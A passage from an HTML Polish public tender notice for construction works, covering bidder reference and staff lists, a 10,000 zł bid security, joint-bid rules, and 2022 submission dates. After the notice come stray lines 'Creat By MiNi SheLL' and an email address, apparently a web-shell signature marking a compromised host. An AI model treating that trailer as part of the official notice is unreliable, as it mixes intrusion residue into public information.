wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli <br/>okres prowadzenia działalności jest krótszy – w tym okresie, porównywalnych z robotami <br/>budowlanymi stanowiącymi przedmiot zamówienia, wraz z podaniem ich rodzaju, wartości, <br/>daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz <br/>załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w <br/>szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa <br/>budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje <br/>bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były <br/>wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie <br/>jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty - Załącznik nr 5 do <br/>SWZ;<br/>2. Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w <br/>szczególności do kierowania robotami budowlanymi wraz z informacjami na temat ich <br/>kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do <br/>wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz <br/>informacja o podstawie do dysponowania tymi osobami -Załącznik nr 8 do SWZ;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w wysokości 10.000,00 zł słownie: dziesięć tysięcy<br/>złotych. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku <br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do <br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno <br/>być załączone do oferty. <br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o<br/>których mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te <br/>potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim <br/>każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, <br/>z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy. Oświadczenie <br/>powinno być złożone zgodnie z wymogami Rozporządzenia Prezesa Rady Ministrów z dnia 30 <br/>grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań <br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w <br/>postepowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020r. poz.2453);<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa <br/>każdy z Wykonawców wspólnie ubiegających się o zamówienie <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Ewentualne zmiany umowy przewidziane zostały w § 5 wzoru umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-29 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć poprzez miniPortal. Wykonawca składa ofertę za pośrednictwem &#34;Formularza do złożenia, zmiany, wycofania oferty lub wniosku&#34; dostępnego na ePUAP i udostępnionego również na miniPortalu. W formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym będzie prowadzona korespondencja związana z postępowaniem.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-29 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-28</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com